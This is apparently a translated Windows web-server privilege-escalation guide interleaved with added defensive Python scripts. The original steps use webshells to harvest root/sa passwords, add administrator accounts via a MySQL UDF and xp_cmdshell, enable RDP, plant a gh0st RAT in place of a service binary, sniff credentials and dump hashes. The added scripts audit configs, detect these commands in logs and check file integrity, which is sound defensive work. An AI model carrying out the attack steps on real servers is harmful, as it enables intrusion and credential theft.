1. Search the website directory for configuration files (config.asp, config.php, conn.asp, and the inc directory) to find high-privilege accounts and passwords, for example the MySQL root password or the SQL Server sa password.
// Modify the following variables according to the account parameters provided by your hosting provider. If you have any questions, contact the server provider.
$dbhost = 'localhost';   // Database server
$dbuser = 'root';        // Database username
$dbpw = '000000';        // Database password
$dbname = 'discuz';      // Database name
$pconnect = 0;           // Persistent database connection: 0 = off, 1 = on
Root account and password obtained:
root
123
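The exposure in step 1 is a web application connecting to its database as root or sa with a weak password stored in a world-readable config file. The following is an added audit script, not part of the original page and not tool code from any project: it parses Discuz-style PHP assignments out of a config file, flags high-privilege accounts and weak passwords, and can walk a web root looking for the file names named above. The file-name list and the weakness heuristic are my own assumptions.

```python
import re
from pathlib import Path

# Configuration file names the text above lists as the usual places DB credentials live
# (assumed list; extend it for other applications).
CONFIG_NAMES = {"config.php", "config.asp", "conn.asp", "config.inc.php"}
# Accounts whose compromise hands over the whole database server.
HIGH_PRIVILEGE_ACCOUNTS = {"root", "sa"}

# Matches quoted PHP assignments such as  $dbuser = 'root';
PHP_ASSIGN = re.compile(r"\$(\w+)\s*=\s*['\"]([^'\"]*)['\"]\s*;")


def parse_db_settings(text):
    """Return {variable_name: value} for every quoted PHP assignment in a config body."""
    return {name.lower(): value for name, value in PHP_ASSIGN.findall(text)}


def is_weak_password(pw):
    """Crude weakness test (assumed policy): shorter than 8 characters or purely numeric."""
    return len(pw) < 8 or pw.isdigit()


def audit_db_settings(settings):
    """Return a list of finding strings for a parsed config dict."""
    findings = []
    user = settings.get("dbuser", "")
    pw = settings.get("dbpw", "")
    if user.lower() in HIGH_PRIVILEGE_ACCOUNTS:
        findings.append(f"web application connects as high-privilege account '{user}'")
    if "dbpw" in settings and is_weak_password(pw):
        findings.append("database password is weak (short or purely numeric)")
    return findings


def audit_webroot(webroot):
    """Walk a web root, audit each config file found, return {path: findings} for files with findings."""
    results = {}
    for path in Path(webroot).rglob("*"):
        if not path.is_file():
            continue
        if path.name.lower() in CONFIG_NAMES or path.parent.name.lower() == "inc":
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            findings = audit_db_settings(parse_db_settings(text))
            if findings:
                results[str(path)] = findings
    return results


# Constructed sample mirroring the Discuz-style config quoted above (not a real file).
SAMPLE_CONFIG = """<?php
$dbhost = 'localhost';
$dbuser = 'root';
$dbpw = '000000';
$dbname = 'discuz';
$pconnect = 0;
"""

if __name__ == "__main__":
    for finding in audit_db_settings(parse_db_settings(SAMPLE_CONFIG)):
        print("FINDING:", finding)
```

The fix on the application side is a dedicated database account limited to the application's own schema with a strong password, and a web server configuration that never serves config files as plain text; `audit_webroot` is meant to run from a host audit, not from the web server process.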
Privilege escalation using MySQL root:
DLL has been successfully exported to c:\windows\system32\mysqldll_1269695183.dll
Function 'state' already exists
select state("net user yhsafe /add")
SQL statement executed successfully: Resource id #2
Array
(
    [0] => The command completed successfully.
Succeed!
    [state("net user yhsafe /add")] => The command completed successfully.
Succeed!
)
Use sa to escalate privileges:
server=localhost;uid=sa;pwd=123;database=master;provider=sqloledb
If xp_cmdshell cannot be executed, restore xp_cmdshell first.
exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'
Enable 3389:
exec master.dbo.xp_cmdshell 'C:\Inetpub\wwwroot\BBS\3389.exe 3389'
Returned results:
Now opening terminal service... Success!
5.2
OK...
Enabled successfully
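Both escalation paths in step 1 leave a clear trail in database logs: the MySQL path creates a user-defined function whose shared library sits in a system directory and then calls it with an OS command, and the SQL Server path re-enables xp_cmdshell and runs `net user` / `net localgroup ... /add` through it. The detector below is an added example, not part of the original page: it runs a small set of regular-expression rules over constructed log lines in MySQL general-log and SQL Server trace style. The rule names, the patterns and the sample lines are my own assumptions, written to cover the commands shown above rather than as a complete rule set.

```python
import re

# Detection rules for the two escalation paths described above (assumed, illustrative patterns).
RULES = [
    # A UDF being registered from a shared library.
    ("mysql_udf_created",
     re.compile(r"create\s+function\s+\w+\s+returns\s+\w+\s+soname", re.I)),
    # The library lives under a Windows system directory, which a normal plugin never does.
    ("mysql_udf_dll_in_system_dir",
     re.compile(r"soname\s+'[^']*(system32|windows)[^']*\.dll'", re.I)),
    # xp_cmdshell being switched back on.
    ("mssql_xp_cmdshell_enabled",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    # xp_cmdshell executing a quoted OS command.
    ("mssql_xp_cmdshell_exec",
     re.compile(r"xp_cmdshell\s+'", re.I)),
    # Local account or group manipulation inside any statement.
    ("os_account_manipulation",
     re.compile(r"net\s+(user|localgroup)\s+\S+.*\s/add\b", re.I)),
]


def classify(line):
    """Return the sorted list of rule names that match one log line."""
    return sorted(name for name, rx in RULES if rx.search(line))


def scan(lines):
    """Return [(line_number, line, matched_rules)] for every line matching at least one rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        matched = classify(line)
        if matched:
            hits.append((number, line, matched))
    return hits


# Constructed sample log lines, not taken from any real system. Lines 2-3 imitate a MySQL
# general log; lines 4-5 imitate a SQL Server trace of the commands quoted above.
SAMPLE_LOG = [
    "2010-03-27T10:02:11 Query  SELECT * FROM cdb_members WHERE uid=1",
    "2010-03-27T10:02:13 Query  CREATE FUNCTION state RETURNS STRING SONAME 'c:\\\\windows\\\\system32\\\\mysqldll_1269695183.dll'",
    "2010-03-27T10:02:14 Query  select state(\"net user yhsafe /add\")",
    "2010-03-27T10:05:40 sa     EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "2010-03-27T10:05:41 sa     exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'",
    "2010-03-27T10:05:50 sa     SELECT name FROM sys.databases",
]

if __name__ == "__main__":
    for number, line, matched in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(matched)}")
```

Each rule on its own can fire on legitimate administration, so in practice the useful alert is the combination within one session: a UDF registration followed within seconds by a call containing `net user`, or `sp_configure 'xp_cmdshell', 1` from the same login that then executes it. Preventing the paths is cheaper than detecting them: the web application account should not be root or sa, the MySQL plugin directory should not be writable by the server process, and xp_cmdshell should stay disabled.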
2. Escalate privileges by exploiting software configuration vulnerabilities or local overflows.
"Brazilian barbecue" privilege escalation:
Run ch.exe "net user 123 123 /add" in the webshell.
360 privilege escalation:
360.exe 3389 // enables Remote Desktop
Press Shift five times to pop up a cmd window.
3. Service replacement method
C:\FTP\ftpserver.exe
Rename ftpserver.exe to ftpserver1.exe.
Upload a reverse-connecting remote control program, for example gh0st.
Rename gh0st to ftpserver.exe.
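Steps 2 and 3 both depend on an executable on disk being swapped or planted under a trusted name (the cmd window popped by five Shift presses comes from an accessibility binary being replaced, and step 3 replaces the service binary itself). The standard countermeasure is a file-integrity baseline. The block below is an added example, not part of the original page: it hashes a set of monitored binaries, stores the hashes as a baseline, and reports files that were modified, removed or newly appeared. `run_demo` reproduces the step 3 swap on constructed files in a temporary directory purely to show the check firing; the function names and the demo contents are my own.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large service binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Record the hash of every monitored file; a file that does not exist is recorded as None."""
    return {str(p): (sha256_of(p) if Path(p).is_file() else None) for p in paths}


def verify_baseline(baseline):
    """Compare the current disk state with the baseline.

    Returns {path: status} only for files that no longer match, where status is
    'modified' (hash changed), 'missing' (was present, now gone) or
    'appeared' (was absent at baseline time, now present).
    """
    changes = {}
    for path, expected in baseline.items():
        current = sha256_of(path) if Path(path).is_file() else None
        if current == expected:
            continue
        if expected is None:
            changes[path] = "appeared"
        elif current is None:
            changes[path] = "missing"
        else:
            changes[path] = "modified"
    return changes


def run_demo():
    """Constructed demonstration: baseline a fake service binary, then replace it the way
    step 3 describes (rename the original, put a different file under the service name),
    and return the verifier's report keyed by file name."""
    with tempfile.TemporaryDirectory() as d:
        service = Path(d) / "ftpserver.exe"
        service.write_bytes(b"original service binary (constructed content)")
        baseline = build_baseline([service])

        # Nothing has changed yet, so the verifier must be silent.
        assert verify_baseline(baseline) == {}

        # The swap: original renamed aside, a different program written under the old name.
        service.rename(Path(d) / "ftpserver1.exe")
        service.write_bytes(b"different program renamed to the service name (constructed)")

        return {Path(p).name: status for p, status in verify_baseline(baseline).items()}


if __name__ == "__main__":
    print(run_demo())
```

In production the baseline should be written from a known-good state, stored where the web server and the service account cannot modify it, and verified by a scheduled job running as a separate account; a service binary whose hash changes outside a patch window is worth an alert on its own.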
4. Use the webshell as a sniffer
FTP and HTTP passwords across the entire server can be sniffed.
A professional tool such as Wireshark is required to view the captured passwords.
5. Dump passwords
Dumping requires administrator or even SYSTEM privileges.
Dump the hashes to penetrate the intranet further.